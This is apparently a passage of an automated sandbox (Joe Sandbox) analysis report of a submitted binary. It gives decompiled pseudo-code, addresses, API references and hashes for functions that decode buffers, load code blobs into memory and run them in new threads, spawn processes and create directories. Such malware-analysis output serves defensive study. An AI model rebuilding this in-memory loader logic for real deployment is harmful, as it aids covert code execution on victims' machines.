							_t82 = _t82 >> 7;
							 *_t104 = _t65 | 0x00000080;
							_t104 =  &(_t104[1]);
						} while (_t82 > 0x7f);
					}
					 *_t104 = _t82 & 0x0000007f;
					_t105 =  &(_t104[1]);
					memcpy(_t105, _t91, _t74);
					_t106 = _t105 + _t74;
					 *_t106 = 0x32;
					_t107 = _t106 + 1;
					_t30 =  &(_t94[0x20]); // 0x0
					_t75 =  *_t30;
					_t84 = _t75;
					_t31 =  &(_t94[0x1c]); // 0x0
					_t92 =  *_t31;
					if(_t75 > 0x7f) {
						do {
							_t63 = _t84;
							_t84 = _t84 >> 7;
							 *_t107 = _t63 | 0x00000080;
							_t107 =  &(_t107[1]);
						} while (_t84 > 0x7f);
					}
					 *_t107 = _t84 & 0x0000007f;
					_t108 =  &(_t107[1]);
					memcpy(_t108, _t92, _t75);
					_t109 = _t108 + _t75;
					 *_t109 = 0x3a;
					_t110 = _t109 + 1;
					_t32 =  &(_t94[0x28]); // 0x0
					_t93 =  *_t32;
					_t86 = _t93;
					_t33 =  &(_t94[0x24]); // 0x0
					_t95 =  *_t33;
					if(_t93 > 0x7f) {
						do {
							_t61 = _t86;
							_t86 = _t86 >> 7;
							 *_t110 = _t61 | 0x00000080;
							_t110 =  &(_t110[1]);
						} while (_t86 > 0x7f);
					}
					 *_t110 = _t86 & 0x0000007f;
					memcpy( &(_t110[1]), _t95, _t93);
					_t72 = _v16;
				}
				return 0 |  *_t72 != 0x00000000;
			}

0x00989f89
0x00989f8b
0x00989f8e
0x00989f93
0x00989f96
0x00989f9b
0x00989fa0
0x00989fa0
0x00989fa3
0x00989fa4
0x00989fa9
0x00989fa9
0x00989fac
0x00989fac
0x00989faf
0x00989fb7
0x00989fc0
0x00989fc3
0x00989fc4
0x00989fc9
0x00989fc9
0x00989fcc
0x00989fd4
0x00989fd6
0x00989fd9
0x00989fda
0x00989fdf
0x00989fdf
0x00989fe2
0x00989fea
0x00989ff0
0x00989ff3
0x00989ff4
0x00989ff9
0x00989ff9
0x00989ffc
0x0098a006
0x0098a010
0x0098a013
0x0098a016
0x0098a01b
0x0098a01e
0x0098a021
0x0098a024
0x0098a02f
0x0098a039
0x0098a03e
0x0098a04e
0x0098a050
0x0098a054
0x0098a05a
0x0098a05d
0x0098a05e
0x0098a063
0x0098a065
0x0098a067
0x0098a06c
0x0098a06e
0x0098a06f
0x0098a077
0x0098a079
0x0098a07d
0x0098a080
0x0098a080
0x0098a083
0x0098a085
0x0098a085
0x0098a08b
0x0098a090
0x0098a090
0x0098a092
0x0098a097
0x0098a099
0x0098a09a
0x0098a090
0x0098a0a3
0x0098a0a5
0x0098a0a8
0x0098a0ae
0x0098a0b3
0x0098a0b6
0x0098a0b9
0x0098a0bc
0x0098a0c0
0x0098a0c3
0x0098a0c6
0x0098a0ca
0x0098a0cd
0x0098a0cd
0x0098a0d0
0x0098a0d2
0x0098a0d2
0x0098a0d8
0x0098a0e0
0x0098a0e0
0x0098a0e2
0x0098a0e7
0x0098a0e9
0x0098a0ea
0x0098a0e0
0x0098a0f3
0x0098a0f5
0x0098a0f8
0x0098a0fe
0x0098a103
0x0098a106
0x0098a107
0x0098a107
0x0098a10a
0x0098a10c
0x0098a10c
0x0098a112
0x0098a114
0x0098a114
0x0098a116
0x0098a11b
0x0098a11d
0x0098a11e
0x0098a114
0x0098a127
0x0098a129
0x0098a12c
0x0098a132
0x0098a137
0x0098a13a
0x0098a13b
0x0098a13b
0x0098a13e
0x0098a140
0x0098a140
0x0098a146
0x0098a148
0x0098a148
0x0098a14a
0x0098a14f
0x0098a151
0x0098a152
0x0098a148
0x0098a15b
0x0098a160
0x0098a166
0x0098a169
0x0098a179

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 0098A041
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0098A048
memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 0098A0A8

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemcpy
String ID:
API String ID: 1874444438-0
Opcode ID: dfd4da2bddb83d5a65f980bdb6f5ee3d428ac7a4b48a28a3ab94585a49a4fd2b
Instruction ID: da9e214b54e80a02922a186c7380c1b8ed7d3e1b7c62bce98573526459409140
Opcode Fuzzy Hash: dfd4da2bddb83d5a65f980bdb6f5ee3d428ac7a4b48a28a3ab94585a49a4fd2b
Instruction Fuzzy Hash: 8261D4719046519FE3249F19C4C475AFBE8FF26714F38456DE88A8BB02C324AC96E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00988990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00988990(signed char __ecx, void* __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed char _t25;
				void* _t31;
				intOrPtr _t34;
				void* _t36;
				void _t38;
				signed char _t39;
				signed char _t41;
				signed int _t47;
				intOrPtr _t50;
				void* _t51;
				signed char _t52;

				_t52 = __ecx;
				_t50 = __ecx + __edx;
				_v8 = _t50;
				while(1) {
					_t47 = 0;
					_t41 = 0;
					_v12 = 0;
					_t39 = 0x80;
					if(_t52 >= _t50) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t39 =  *_t52;
						_t52 = _t52 + 1;
						_t47 = _t47 | (_t39 & 0x7f) << _t41;
						if(_t39 >= 0) {
							break;
						}
						_t41 = _t41 + 7;
						if(_t52 < _t50) {
							continue;
						}
						break;
					}
					_v12 = _t47;
					L6:
					_t25 =  !((_t39 & 0x000000ff) >> 7);
					if((_t25 & 0x00000001) != 0) {
						_t25 = _t47 + _t52;
						if(_t25 <= _t50) {
							_v16 = _t52;
							_t52 = _t25;
							_t25 = E009887C0( &_v16,  &_v28);
							if(_t25 != 0) {
								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								if(_t51 == 0) {
									L1:
									_t50 = _v8;
									continue;
								} else {
									_t31 = E00981F40(_v24, _v20);
									 *(_t51 + 8) = _t31;
									if(_t31 == 0) {
										L15:
										HeapFree(GetProcessHeap(), 0, _t51);
										goto L1;
									} else {
										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
										if(_t34 == 0) {
											L14:
											VirtualFree( *(_t51 + 8), 0, 0x8000);
											goto L15;
										} else {
											_t36 = CreateThread(0, 0, E00988880, _t51, 0, 0);
											 *(_t51 + 0x10) = _t36;
											if(_t36 == 0) {
												goto L14;
											} else {
												 *((intOrPtr*)(_t51 + 4)) = _v28;
												_t38 =  *0x98c274; // 0x0
												 *_t51 = _t38;
												 *0x98c274 = _t51;
												goto L1;
											}
										}
									}
								}
								L17:
							}
						}
					}
					return _t25;
					goto L17;
				}
			}

0x00988998
0x0098899b
0x0098899e
0x009889a6
0x009889a6
0x009889a8
0x009889aa
0x009889ad
0x009889b1
0x00000000
0x00000000
0x00000000
0x00000000
0x009889b3
0x009889b3
0x009889b3
0x009889b5
0x009889be
0x009889c2
0x00000000
0x00000000
0x009889c4
0x009889c9
0x00000000
0x00000000
0x00000000
0x009889c9
0x009889cb
0x009889ce
0x009889d4
0x009889d8
0x009889de
0x009889e3
0x009889e9
0x009889f2
0x009889f4
0x009889fb
0x00988a12
0x00988a16
0x009889a3
0x009889a3
0x00000000
0x00988a18
0x00988a1e
0x00988a23
0x00988a28
0x00988a7b
0x00988a85
0x00000000
0x00988a2a
0x00988a31
0x00988a33
0x00988a36
0x00988a6b
0x00988a75
0x00000000
0x00988a38
0x00988a46
0x00988a4c
0x00988a51
0x00000000
0x00988a53
0x00988a56
0x00988a59
0x00988a5e
0x00988a60
0x00000000
0x00988a60
0x00988a51
0x00988a36
0x00988a28
0x00000000
0x00988a16
0x009889fb
0x009889e3
0x00988a96
0x00000000
0x00988a96

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,00988F82), ref: 00988A05
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00988A0C
CreateThread.KERNEL32(00000000,00000000,00988880,00000000,00000000,00000000), ref: 00988A46
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,00988F82), ref: 00988A75
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00988F82), ref: 00988A7E
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00988F82), ref: 00988A85

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
String ID:
API String ID: 1073023709-0
Opcode ID: f68bd202b793ca05a04224b760096fd565670a7b1ce0accb33c27a272acd3a8b
Instruction ID: 25cfffe90d92701a093668fce3bf54a7bd39395f68f33a23409cf52c811e9c3c
Opcode Fuzzy Hash: f68bd202b793ca05a04224b760096fd565670a7b1ce0accb33c27a272acd3a8b
Instruction Fuzzy Hash: 933149B1A04602AFDB14EF69CC85B6AB7B8FB84700F508515E555D7380EF70E801DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00982180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00982180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
				char _v8;
				struct _STARTUPINFOW _v76;
				int _t29;
				WCHAR* _t31;
				int _t35;
				void* _t36;

				_t35 = 0;
				_t31 = __ecx;
				memset( &_v76, 0, 0x44);
				_t36 = _a4;
				_v76.cb = 0x44;
				if(_t36 == 0) {
					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
				} else {
					_t5 = _t35 + 0x10; // 0x10
					E00981830(0x981030, _t5, 0x47deb7fb,  &_a4);
					_v76.lpDesktop = _a4;
					_push(0);
					_push(_t36);
					_push( &_v8);
					if( *0x98c21c() != 0) {
						_t29 =  *0x98c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
						_t35 = _t29;
						 *0x98c220(_v8);
					}
					HeapFree(GetProcessHeap(), 0, _a4);
					return _t35;
				}
			}

0x0098218b
0x00982192
0x00982194
0x0098219a
0x009821a0
0x009821a9
0x0098223e
0x009821ab
0x009821b9
0x009821bc
0x009821c7
0x009821cd
0x009821ce
0x009821cf
0x009821d8
0x009821f0
0x009821f9
0x009821fb
0x009821fb
0x0098220d
0x0098221b
0x0098221b

APIs

memset.NTDLL ref: 00982194
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,0098A52C), ref: 00982232

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00982206
HeapFree.KERNEL32(00000000), ref: 0098220D

Strings

D, xrefs: 009821A0

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCreateFreememset
String ID: D
API String ID: 3667606640-2746444292
Opcode ID: 4b0bc9c3b4c38c30a09f77c32a1f8429b32d5af149d068936063a86ae2580c72
Instruction ID: 64540c1dde38e262b806bc16a47800bf0d00c205e5c9bcb0a5adb2a20b0f7d78
Opcode Fuzzy Hash: 4b0bc9c3b4c38c30a09f77c32a1f8429b32d5af149d068936063a86ae2580c72
Instruction Fuzzy Hash: AC1189B2A04208BBDB209FA5EC48EDF7F7CEF85755F004025FA08E6240D6319A55DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 009818D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009818D0() {
				short _v524;
				signed int _t14;
				signed char _t16;
				void* _t21;
				void* _t22;

				memset( &_v524, 0, 0x208);
				if( *0x98c7c0 == 0) {
					L9:
					return 1;
				} else {
					_t21 = 0;
					do {
						_t2 = _t21 + 0x98c7c0; // 0x0
						_t14 =  *_t2 & 0x0000ffff;
						_t21 = _t21 + 2;
						 *(_t22 + _t21 - 0x20a) = _t14;
						if(_t14 != 0x5c) {
							goto L8;
						} else {
							_t16 = GetFileAttributesW( &_v524);
							if(_t16 != 0xffffffff) {
								if((_t16 & 0x00000010) == 0) {
									goto L6;
								} else {
									goto L8;
								}
							} else {
								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
									goto L8;
								} else {
									L6:
									return 0;
								}
							}
						}
						goto L10;
						L8:
					} while ( *(_t21 + 0x98c7c0) != 0);
					goto L9;
				}
				L10:
			}

0x009818e8
0x009818f9
0x0098195e
0x00981967
0x009818fb
0x009818fb
0x00981900
0x00981900
0x00981900
0x00981907
0x0098190a
0x00981915
0x00000000
0x00981917
0x0098191e
0x00981927
0x00981952
0x00000000
0x00000000
0x00000000
0x00000000
0x00981929
0x0098193a
0x00000000
0x00981949
0x00981949
0x0098194f
0x0098194f
0x0098193a
0x00981927
0x00000000
0x00981954
0x00981954
0x00000000
0x00981900
0x00000000

APIs

memset.NTDLL ref: 009818E8
GetFileAttributesW.KERNEL32(?), ref: 0098191E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00981932
GetLastError.KERNEL32 ref: 0098193C

Strings

@Mxt, xrefs: 0098193C

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryErrorFileLastmemset
String ID: @Mxt
API String ID: 528582180-1922883433
Opcode ID: 778706561d126a6808465ff5b2b5da4e31ca4782cbab33cbbe678ea404bccf10
Instruction ID: c9b8935783bb2c67b01a62196305b048067f9e6c0636d081ea079aa4966eb69a
Opcode Fuzzy Hash: 778706561d126a6808465ff5b2b5da4e31ca4782cbab33cbbe678ea404bccf10
Instruction Fuzzy Hash: DA01247291430986EB70AB64BC8CBE6736CFB00715F000695E968E33D1E776A886CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 009823F0, Relevance: 7.6, APIs: 5, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00982422
RtlAllocateHeap.NTDLL(00000000), ref: 00982429
memcpy.NTDLL(00988583,?,?), ref: 00982467
GetProcessHeap.KERNEL32(00000000,00988583), ref: 0098250A
HeapFree.KERNEL32(00000000), ref: 00982511

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: a73b048ddd4d56dc8c4fbe55912ec3ac02cb7d1ea42c497a35587e52f06bd314
Instruction ID: 77aea81a0e0e440c3c2aa8b018831f1212899faca79b24c9eda598874f75174b
Opcode Fuzzy Hash: a73b048ddd4d56dc8c4fbe55912ec3ac02cb7d1ea42c497a35587e52f06bd314
Instruction Fuzzy Hash: CC414DB1904209EFDF11DFA4DC48FAABBB9EF44340F144169F915E72A1E7319A04EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00982530, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00988644,?), ref: 0098256D
RtlAllocateHeap.NTDLL(00000000), ref: 00982574
memcpy.NTDLL(00988644,?,?), ref: 009825AE
GetProcessHeap.KERNEL32(00000000,00988644), ref: 0098260C
HeapFree.KERNEL32(00000000), ref: 00982613

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 1a9775ebda560cccdcb214f229fd8e4690f2c3c40339ce480e11c95b5fcaeccf
Instruction ID: a5791d7b0ea589bfecf496d73d67d8706f95e89da45fe599f10b80740d87a8e2
Opcode Fuzzy Hash: 1a9775ebda560cccdcb214f229fd8e4690f2c3c40339ce480e11c95b5fcaeccf
Instruction Fuzzy Hash: C03182B1654205BFEB119FA4EC85B99BBB9FB04740F200161F905E63A0E7719950AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00988290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00988290(int* __ecx, signed int _a8) {
				intOrPtr _t66;
				int* _t88;
				signed int _t89;
				void* _t90;

				_t89 = _a8;
				_t88 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = _t89;
				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
				if((_t89 & 0x00008000) == 0) {
					_t17 = _t88 + 0x29272; // 0x29272
					memset(_t17, 0, 0x10000);
					_t90 = _t90 + 0xc;
				}
				_t18 = _t88 + 0x9273; // 0x9273
				 *(_t88 + 0x44) = 0;
				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
				_t21 = _t88 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
				_t23 = _t88 + 0x39272; // 0x39272
				_t66 = _t23;
				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
				_t26 = _t88 + 0x8192; // 0x8192
				 *(_t88 + 0x40) = 0;
				 *(_t88 + 0x3c) = 0;
				 *(_t88 + 0x24) = 0;
				 *(_t88 + 0x20) = 0;
				 *(_t88 + 0x1c) = 0;
				 *(_t88 + 0x68) = 0;
				 *(_t88 + 0x48) = 0;
				 *(_t88 + 0x64) = 0;
				 *(_t88 + 0x60) = 0;
				 *(_t88 + 0x5c) = 0;
				 *(_t88 + 0x58) = 0;
				 *((intOrPtr*)(_t88 + 0x38)) = 8;
				 *(_t88 + 0x6c) = 0;
				 *(_t88 + 0x54) = 0;
				 *(_t88 + 0x50) = 0;
				 *(_t88 + 0x4c) = 0;
				 *((intOrPtr*)(_t88 + 0x18)) = 1;
				 *(_t88 + 0x70) = 0;
				 *(_t88 + 0x74) = 0;
				 *(_t88 + 0x78) = 0;
				 *(_t88 + 0x7c) = 0;
				 *(_t88 + 0x80) = 0;
				 *(_t88 + 0x84) = 0;
				 *(_t88 + 0x88) = 0;
				 *(_t88 + 0x8c) = 0;
				memset(_t26, 0, 0x240);
				_t52 = _t88 + 0x83d2; // 0x83d2
				memset(_t52, 0, 0x40);
				return 0;
			}

0x00988294
0x009882aa
0x009882bc
0x009882c2
0x009882c9
0x009882cc
0x009882d4
0x009882ef
0x009882f8
0x009882ff
0x00988308
0x0098830e
0x0098830e
0x00988311
0x00988317
0x0098831e
0x00988321
0x00988327
0x0098832a
0x0098832a
0x00988335
0x00988338
0x0098833b
0x00988344
0x0098834b
0x00988352
0x00988359
0x00988360
0x00988367
0x0098836e
0x00988375
0x0098837c
0x00988383
0x0098838a
0x00988391
0x00988398
0x0098839f
0x009883a6
0x009883ad
0x009883b4
0x009883bb
0x009883c2
0x009883c9
0x009883d0
0x009883d7
0x009883e1
0x009883eb
0x009883f5
0x009883ff
0x00988407
0x00988410
0x0098841e

APIs

memset.NTDLL ref: 00988308
memset.NTDLL ref: 009883FF
memset.NTDLL ref: 00988410

Strings

VUUU, xrefs: 00988297
VUUU, xrefs: 009882CF

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: memset
String ID: VUUU$VUUU
API String ID: 2221118986-3149182767
Opcode ID: 93ef2372cb5b4ac9ed374c9cfeeac64bb5b0a35cfe1c88ebfffdc7cdde839fbe
Instruction ID: 435911a3bf8e233556ee168c2037869a6dc4669f2a7fcfe9d7c7d65bd8ef8287
Opcode Fuzzy Hash: 93ef2372cb5b4ac9ed374c9cfeeac64bb5b0a35cfe1c88ebfffdc7cdde839fbe
Instruction Fuzzy Hash: 4141CBB1610A06BBE308CF65C469782FBE4FF44708F548219D6598BB80D7BAB168DFC4

Uniqueness

Uniqueness Score: -1.00%

Function 009899A0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

_snwprintf.NTDLL ref: 009899E3
GetProcessHeap.KERNEL32(00000000,00988F37), ref: 00989A5E
HeapFree.KERNEL32(00000000), ref: 00989A65
GetProcessHeap.KERNEL32(00000000,?), ref: 00989A70
HeapFree.KERNEL32(00000000), ref: 00989A77

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate_snwprintf
String ID:
API String ID: 2579732983-0
Opcode ID: 939fed92365b1c534ab121fa45b89d57c8db3e68a86a86dd56938af0c4847a3c
Instruction ID: a8f14b34bab328c1ab280b633ef49f742bf7104f16e83d6299d10fb36a8070cd
Opcode Fuzzy Hash: 939fed92365b1c534ab121fa45b89d57c8db3e68a86a86dd56938af0c4847a3c
Instruction Fuzzy Hash: C42184B1A58208FBEB10ABE0AC4AFE9776D9B08701F100061FA05E52E1D7B19A449B61

Uniqueness

Uniqueness Score: -1.00%

Function 00988AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00988AA0() {
				int _t8;
				void* _t16;
				void* _t17;

				_t17 =  *0x98c274; // 0x0
				if(_t17 != 0) {
					do {
						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
						_t17 =  *_t17;
					} while (_t17 != 0);
					_t17 =  *0x98c274; // 0x0
				}
				_t16 = 0x98c274;
				while(_t17 != 0) {
					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
					if(_t8 == 0x102) {
						_t16 = _t17;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
						VirtualFree( *(_t17 + 8), 0, 0x8000);
						CloseHandle( *(_t17 + 0x10));
						 *_t16 =  *_t17;
						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
					}
					_t17 =  *_t16;
				}
				return _t8;
			}

0x00988aa1
0x00988aaa
0x00988ab0
0x00988aba
0x00988abc
0x00988abe
0x00988ac2
0x00988ac2
0x00988ac8
0x00988acf
0x00988ad6
0x00988ae1
0x00988b1e
0x00988ae3
0x00988aed
0x00988af9
0x00988b02
0x00988b0d
0x00988b16
0x00988b16
0x00988b20
0x00988b22
0x00988b28

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00989315,00989286), ref: 00988AD6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00988AF9
CloseHandle.KERNEL32(?), ref: 00988B02
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00988B0F
HeapFree.KERNEL32(00000000), ref: 00988B16

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: 6db1e64a09929e5f56f930f1bbd4217e45770f09db2e9575547072858fa7e3b3
Instruction ID: 25bb7ae966658b524ca52e547add20eeb095ccd46420f6f0c510687ab696c615
Opcode Fuzzy Hash: 6db1e64a09929e5f56f930f1bbd4217e45770f09db2e9575547072858fa7e3b3
Instruction Fuzzy Hash: 7F016D72918720ABDB315F94EC48B0777A5EF44B20F154A14F9A2AB7E0CB30AC419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009888B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009888B0(long __ecx) {
				int _t6;
				long _t13;
				void* _t15;
				void* _t16;

				_t16 =  *0x98c274; // 0x0
				_t13 = __ecx;
				_t15 = 0x98c274;
				while(_t16 != 0) {
					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
					if(_t6 == 0x102) {
						_t15 = _t16;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
						VirtualFree( *(_t16 + 8), 0, 0x8000);
						CloseHandle( *(_t16 + 0x10));
						 *_t15 =  *_t16;
						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
					}
					_t16 =  *_t15;
				}
				return _t6;
			}

0x009888b2
0x009888b8
0x009888bb
0x009888c2
0x009888c8
0x009888d3
0x00988910
0x009888d5
0x009888df
0x009888eb
0x009888f4
0x009888ff
0x00988908
0x00988908
0x00988912
0x00988914
0x0098891b

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,00988F3E), ref: 009888C8
